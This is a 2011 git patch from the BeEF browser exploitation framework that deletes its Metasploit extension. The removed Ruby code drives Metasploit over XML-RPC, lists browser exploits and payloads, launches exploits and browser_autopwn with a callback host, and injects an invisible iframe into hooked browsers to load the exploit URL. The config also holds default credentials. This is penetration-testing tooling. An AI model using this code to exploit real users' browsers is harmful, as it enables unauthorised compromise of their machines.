From 97b244d61a51e68d9bc4a9d36de3093f2cc8e330 Mon Sep 17 00:00:00 2001
From: passbe
Date: Fri, 2 Sep 2011 23:58:55 +0000
Subject: [PATCH] Removing old Metasploit extension

git-svn-id: https://beef.googlecode.com/svn/trunk@1258 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
---
extensions/metasploit/config.yaml | 33 ----
extensions/metasploit/dbmigration.rb | 96 -----------
extensions/metasploit/extension.rb | 33 ----
extensions/metasploit/filters.rb | 28 ----
extensions/metasploit/msfcommand.rb | 228 --------------------------
extensions/metasploit/rpcclient.rb | 230 ---------------------------
6 files changed, 648 deletions(-)
delete mode 100644 extensions/metasploit/config.yaml
delete mode 100644 extensions/metasploit/dbmigration.rb
delete mode 100644 extensions/metasploit/extension.rb
delete mode 100644 extensions/metasploit/filters.rb
delete mode 100644 extensions/metasploit/msfcommand.rb
delete mode 100644 extensions/metasploit/rpcclient.rb
diff --git a/extensions/metasploit/config.yaml b/extensions/metasploit/config.yaml
deleted file mode 100644
index e246c8e36..000000000
--- a/extensions/metasploit/config.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-#
-# Copyright 2011 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-#
-# Enable MSF by changing extension:metasploit:enable to true
-# Then set msf_callback_host to be the public IP of your MSF server
-#
-# Ensure you load the xmlrpc interface in Metasploit
-# msf > load xmlrpc ServerHost=10.211.55.2 Pass=abc123 ServerType=Web
-# Please note that the ServerHost parameter must have the same value of host and callback_host variables here below.
-beef:
- extension:
- metasploit:
- name: 'Metasploit'
- enable: true
- host: "127.0.0.1"
- url-path: "/RPC2"
- port: 55553
- user: "msf"
- pass: "abc123"
- callback_host: "192.168.84.1"
- autopwn_url: "autopwn"
diff --git a/extensions/metasploit/dbmigration.rb b/extensions/metasploit/dbmigration.rb
deleted file mode 100644
index c00a13979..000000000
--- a/extensions/metasploit/dbmigration.rb
+++ /dev/null
@@ -1,96 +0,0 @@
-#
-# Copyright 2011 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-#
-module BeEF
-module Extension
-module Metasploit
-
- module DbMigration
-
- extend BeEF::API::Migration
-
- def self.migrate_commands
- msf = BeEF::Extension::Metasploit::RpcClient.instance
-
- # verify that metasploit is enabled and we are logged in.
- if(msf.is_enabled && msf.login())
- Thread.new() {
- begin
- sploits = msf.browser_exploits()
- sploits.each do |sploit|
- if not BeEF::Core::Models::CommandModule.first(:name => sploit)
- mod = BeEF::Core::Models::CommandModule.new(:path => "Dynamic/Msf", :name => sploit)
- mod.save
- if mod.dynamic_command_info == nil
- msfi = msf.get_exploit_info(sploit)
- st = sploit.split('/').first
- targets = []
-
- os_name = BeEF::Core::Constants::Os::match_os(st)
-
- browsers = BeEF::Core::Constants::Browsers::match_browser(msfi['name'] + msfi['targets'].to_json)
- targets << {'os_name' => os_name, 'browser_name' => 'ALL', 'verified_status' =>
- BeEF::Core::Constants::CommandModule::VERIFIED_UNKNOWN} if browsers.count == 0
-
- browsers.each do |bn|
- targets << {'os_name' => os_name, 'browser_name' => bn, 'verified_status' =>
- BeEF::Core::Constants::CommandModule::VERIFIED_WORKING
- }
- end
-
- targets << {'os_name' => "ALL", 'verified_status' => BeEF::Core::Constants::CommandModule::VERIFIED_NOT_WORKING}
-
- msfci = BeEF::Core::Models::DynamicCommandInfo.new(
- :name => msfi['name'],
- :description => msfi['description'],
- :targets => targets.to_json)
-
- mod.dynamic_command_info = msfci
- mod.save
- end
- end
- end
-
- payloads = msf.payloads()
- payloads.each do |payload|
- if not BeEF::Core::Models::DynamicPayloads.first( :name => payload)
- pl = BeEF::Core::Models::DynamicPayloads.new( :name => payload)
- pl.save
- opts = msf.payload_options(payload)
- opts.keys.each do |opt|
- next if opts[opt]['advanced'] or opts[opt]['evasion']
- pl.dynamic_payload_info.new(:name => opt, :description => opts[opt]['desc'], :required => opts[opt]['required'], :value => opts[opt]['default'])
- end
- pl.save
- end
- end
-
- # Catching and printing exceptions in regards to migration
- # of Metasploit exploits into BeEF
- rescue Exception => e
- puts e.message
- puts e.backtrace
- end
- msf.launch_autopwn()
-
- }#thread end
- end
- end
-
- end
-
-end
-end
-end
diff --git a/extensions/metasploit/extension.rb b/extensions/metasploit/extension.rb
deleted file mode 100644
index 4db03c885..000000000
--- a/extensions/metasploit/extension.rb
+++ /dev/null
@@ -1,33 +0,0 @@
-#
-# Copyright 2011 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-#
-module BeEF
-module Extension
-module Metasploit
-
- extend BeEF::API::Extension
-
- @short_name = @full_name = 'metasploit'
-
- @description = 'use metasploit exploits with beef'
-
-end
-end
-end
-
-require 'extensions/metasploit/filters'
-require 'extensions/metasploit/rpcclient'
-require 'extensions/metasploit/msfcommand'
-require 'extensions/metasploit/dbmigration'
diff --git a/extensions/metasploit/filters.rb b/extensions/metasploit/filters.rb
deleted file mode 100644
index 6c3d900f7..000000000
--- a/extensions/metasploit/filters.rb
+++ /dev/null
@@ -1,28 +0,0 @@
-#
-# Copyright 2011 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-#
-#
-# We extend the default filters to include the filters for Metasploit
-#
-module BeEF
-module Filters
-
- def self.is_valid_msf_payload_name?(name)
- return false if only?("a-z_/", name)
- true
- end
-
-end
-end
\ No newline at end of file
diff --git a/extensions/metasploit/msfcommand.rb b/extensions/metasploit/msfcommand.rb
deleted file mode 100644
index 3ae64ff34..000000000
--- a/extensions/metasploit/msfcommand.rb
+++ /dev/null
@@ -1,228 +0,0 @@ -# -# Copyright 2011 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# -module BeEF -module Modules -module Commands - - class Msf < BeEF::Core::Command - - def initialize - h = { - 'name' => 'Generic Metasploit Exploit', - 'description' => 'This module will launch a Metasploit exploit against the host', - 'category' => 'Metasploit', - 'author' => ['sussurro'] - } - - BeEF::Core::Configuration.instance.set('beef.module.gmsf', h) - super('gmsf') - end - - def callback - save({'result' => @datastore['result']}) - end - - # - def update_info(id) - mod = BeEF::Core::Models::CommandModule.first(:id => id) - msfinfo = nil - targets = [] - - if mod.dynamic_command_info == nil - msf = BeEF::Extension::Metasploit::RpcClient.instance - msf.login() - msfinfo = msf.get_exploit_info(mod.name) - - st = mod.name.split('/').first - puts "st: " + st - - os_name = BeEF::Core::Constants::Os::match_os(st) - - browsers = BeEF::Core::Constants::Browsers::match_browser(msfinfo['name'] + msfinfo['targets'].to_json) - - targets << {'os_name' => os_name, 'browser_name' => 'ALL', 'verified_status' => - BeEF::Core::Constants::CommandModule::VERIFIED_UNKNOWN} if browsers.count == 0 - - browsers.each do |bn| - targets << {'os_name' => os_name, 'browser_name' => bn, 'verified_status' => - BeEF::Core::Constants::CommandModule::VERIFIED_WORKING - } - end - - targets << {'os_name' => "ALL", 'verified_status' => 
BeEF::Core::Constants::CommandModule::VERIFIED_NOT_WORKING} - - mod.dynamic_command_info = BeEF::Core::Models::DynamicCommandInfo.new( - :name => msfinfo['name'], - :description => msfinfo['description'], - :targets => targets.to_json) - mod.save - else - msfinfo = mod.dynamic_command_info - targets = JSON.parse(msfinfo['targets']) - end - - @info['Name'] = msfinfo['name'] - @info['Description'] = msfinfo['description'] - @info['MsfModName'] = mod.name - @info['mod-id'] = mod.id - @info['msfid'] = mod.name - @target = targets - end - - def update_data() - modname = @info['MsfModName'] - - msf = BeEF::Extension::Metasploit::RpcClient.instance - if not msf.is_enabled - @info['Description'] += "
" + "*"*15 + "WARNING" + "*"*15 + "
" - @info['Description'] += "Metasploit capapbilities have been disabled, please verify your configuration or if msf_enabled = 1 then check the BeEF console for errors" - return - end - - msfoptions = msf.get_options(modname) - - msfoptions.keys.each { |k| - next if msfoptions[k]['advanced'] == true - next if msfoptions[k]['evasion'] == true - - @info['Data'] << { 'name' => k + '_txt', 'type' => 'label', 'text' => msfoptions[k]['desc']} - - case msfoptions[k]['type'] - when "string","address","port" - msfoptions[k]['default'] = rand(32**20).to_s(32) if k == "URIPATH" - @info['Data'] << {'name' => k , 'ui_label' => k, 'value' => (oc_value(k) || msfoptions[k]['default'])} - when "bool" - @info['Data'] << {'name' => k, 'type' => 'checkbox', 'ui_label' => k } - when "enum" - enumdata = [] - msfoptions[k]['enums'].each { |e| - enumdata << [e] - } - @info['Data'] << { 'name' => k, 'type' => 'combobox', 'ui_label' => k, 'store_type' => 'arraystore', 'store_fields' => ['enum'], 'store_data' => enumdata, 'valueField' => 'enum', 'displayField' => 'enum' , 'autoWidth' => true, 'mode' => 'local', 'value' => (oc_value(k) || msfoptions[k]['default'])} - end - } - - msfpayloads = msf.get_payloads(modname) - - return if not msfpayloads or not msfpayloads['payloads'] - - payloads = msfpayloads['payloads'] - - pl = [] - pl << [(oc_value('PAYLOAD') || 'generic/shell_bind_tcp')] - - payloads.each { |p| - pl << [p] - } - - @info['Data'] << { 'name' => 'PAYLOAD', - 'type' => 'combobox', - 'anchor' => '95% -100', - 'ui_label' => 'Payload', - 'store_type' => 'arraystore', - 'store_fields' => ['payload'], - 'store_data' => pl, - 'valueField' => 'payload', - 'displayField' => 'payload' , - 'autoWidth' => true, - 'mode' => 'local', - 'reloadOnChange' => true, # reload payloads - 'defaultPayload' => "generic/shell_bind_tcp", # default combobox value - 'emptyText' => "select a payload..." 
- } - - @info['Data'] << { 'name' => 'mod_id' , 'id' => 'mod_id', 'type' => 'hidden', 'value' => @info['mod-id'] } - end - - def get_payload_options(payload_name) - # get payload options from metasploit - msf_xmlrpc_clinet = BeEF::Extension::Metasploit::RpcClient.instance - msf_xmlrpc_clinet.login() - payload_options = msf_xmlrpc_clinet.payload_options(payload_name) - - info = {} - info['Data'] = [] - - payload_options.keys.each { |k| - next if payload_options[k]['advanced'] == true - next if payload_options[k]['evasion'] == true - info['Data'] << { 'name' => k + '_txt', 'type' => 'label', 'text' => payload_options[k]['desc']} - case payload_options[k]['type'] - when "string","address","port","raw","path", "integer" - payload_options[k]['default'] = "127.0.0.1" if k == "RHOST" - info['Data'] << {'name' => k , 'ui_label' => k, 'value' => (oc_value(k) || payload_options[k]['default'])} - when "bool" - info['Data'] << {'name' => k, 'type' => 'checkbox', 'ui_label' => k } - when "enum" - info['Data'] << { 'name' => k, 'type' => 'combobox', 'ui_label' => k, 'store_type' => 'arraystore', 'store_fields' => ['enum'], 'store_data' => payload_options[k]['enums'], 'valueField' => 'enum', 'displayField' => 'enum' , 'autoWidth' => true, 'mode' => 'local', 'value' => (oc_value(k) || payload_options[k]['default'])} - else - # Debug output if the payload option type isn't found - puts "K => #{k}\n" - puts "Status => #{payload_options[k]['advanced']}\n" - puts "Type => #{payload_options[k]['type']}\n" - puts payload_options[k] - end - } - - # turn results into JSON - payload_options_json = [] - payload_options_json[1] = JSON.parse(info.to_json) - - JSON.parse(info.to_json) - - end - - def launch_exploit(opts) - msf = BeEF::Extension::Metasploit::RpcClient.instance - msf.login() - ret = msf.launch_exploit(@info['msfid'],opts) - @output = "\n" if ret['result'] == 'success' - ret - end - - def output - if @datastore - @datastore['command_url'] = 
BeEF::Core::Server.instance.get_command_url(@default_command_url) - @datastore['command_id'] = @command_id - end - - return " -beef.execute(function() { - var result; - - try { - var sploit = beef.dom.createInvisibleIframe(); - sploit.src = '#{datastore['sploit_url']}'; - } catch(e) { - for(var n in e) - result+= n + ' ' + e[n] ; - } - -});" - end - - def callback - content = {} - content['Exploit Results'] = @datastore['result'] - save content - end - end - -end -end -end - - diff --git a/extensions/metasploit/rpcclient.rb b/extensions/metasploit/rpcclient.rb deleted file mode 100644 index 04f4a6d21..000000000 --- a/extensions/metasploit/rpcclient.rb +++ /dev/null 
@@ -1,230 +0,0 @@
-#
-# Copyright 2011 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-#
-module BeEF
-module Extension
-module Metasploit
-
- #
- # XML RPC Client for Metasploit
- #
- class RpcClient < ::XMLRPC::Client
-
- include Singleton
-
- def initialize
- @config = BeEF::Core::Configuration.instance
- @enabled = (@config.get('beef.extension.metasploit.enable'))
-
- return if (not @enabled)
-
- host = @config.get('beef.extension.metasploit.host')
- path = @config.get('beef.extension.metasploit.url-path')
- port = @config.get('beef.extension.metasploit.port')
- @un = @config.get('beef.extension.metasploit.user')
- @pw = @config.get('beef.extension.metasploit.pass')
- @apurl = @config.get('beef.extension.metasploit.autopwn_url') || "autopwn"
- @lock = false
-
- if(not host or not path or not port or not @un or not @pw)
- print_error 'There is not enough information to initalize Metasploit connectivity at this time'
- print_error 'Please check your options in config.yaml to verify that all information is present'
- @enabled = false
- end
-
- @token = nil
- @lastauth = nil
-
- super(host,path,port)
- end
-
- def get_lock()
- sleep 0.2 while @lock
- @lock = true
- end
-
- def release_lock()
- @lock = false
- end
-
- # is metasploit enabled in the configuration
- def is_enabled
- @enabled
- end
-
- # login into metasploit
- def login
- get_lock()
- res = self.call("auth.login", @un ,@pw )
-
- if(not (res and res['result'] == "success"))
- @enabled = false
- release_lock()
- print_error 'Could not authenticate to Metasploit xmlrpc.'
- return false
- end
-
- print_info 'Successful connection with Metasploit.' if not @lastauth
-
- @token = res['token']
- @lastauth = Time.now
-
- release_lock()
- true
- end
-
- # sends commands to the metasploit xml rpc server
- def call(meth, *args)
- return if not @enabled
-
- if(meth != "auth.login")
- self.login() if not @token
- args.unshift(@token)
- end
-
- begin
- super(meth, *args)
- rescue Errno::ECONNREFUSED
- print_error "Connection to Metasploit backend failed."
- @enabled = false
- return false
- rescue XMLRPC::FaultException => e
- if e.faultCode == 401 and meth == "auth.login"
- print_error "Your username and password combination was rejected by the Metasploit backend server"
- @enabled = false
- elsif e.faultCode == 401
- res = self.login()
- else
- print_error "An unknown exception has occured while talking to the Metasploit backend."
- print_error "The Exception text is (#{e.faultCode} : #{e.faultString}."
- print_error "Please check the Metasploit logs for more details."
- end
- return false
- rescue Exception => e
- print_error "An unknown exception (#{e}) has occured while talking to the Metasploit backend."
- print_error "Please check the Metasploit logs for more details."
- return false
- end
- end
-
- def browser_exploits()
- return if not @enabled
-
- get_lock()
- res = self.call('module.exploits')
- return [] if not res or not res['modules']
-
- mods = res['modules']
- ret = []
-
- mods.each do |m|
- ret << m if(m.include? '/browser/')
- end
-
- release_lock()
- ret.sort
- end
-
- def get_exploit_info(name)
- return if not @enabled
- get_lock()
- res = self.call('module.info','exploit',name)
- release_lock()
- res || {}
- end
-
- def get_payloads(name)
- return if not @enabled
- get_lock()
- res = self.call('module.compatible_payloads',name)
- release_lock()
- res || {}
- end
-
- def get_options(name)
- return if not @enabled
- get_lock()
- res = self.call('module.options','exploit',name)
- release_lock()
- res || {}
- end
-
- def payloads()
- return if not @enabled
- get_lock()
- res = self.call('module.payloads')
- release_lock()
- return {} if not res or not res['modules']
- res['modules']
- end
-
- def payload_options(name)
- return if not @enabled
- get_lock()
- res = self.call('module.options','payload',name)
- release_lock
- return {} if not res
- res
- end
-
- def launch_exploit(exploit,opts)
- return if not @enabled
- get_lock()
- begin
- res = self.call('module.execute','exploit',exploit,opts)
- rescue Exception => e
- print_error "Exploit failed for #{exploit} \n"
- release_lock()
- return false
- end
-
- release_lock()
-
- uri = ""
- if opts['SSL']
- uri += "https://"
- else
- uri += "http://"
- end
-
- uri += @config.get('beef.extension.metasploit.callback_host') + ":" + opts['SRVPORT'] + "/" + opts['URIPATH']
-
- res['uri'] = uri
- res
- end
-
- def launch_autopwn
- return if not @enabled
- opts = {
- 'LHOST' => @config.get('beef.extension.metasploit.callback_host') ,
- 'URIPATH' => @apurl
- }
- get_lock()
- begin
- res = self.call('module.execute','auxiliary','server/browser_autopwn',opts)
- rescue Exception => e
- print_error "Failed to launch autopwn\n"
- release_lock()
- return false
- end
- release_lock()
-
- end
-
- end
-
-end
-end
-end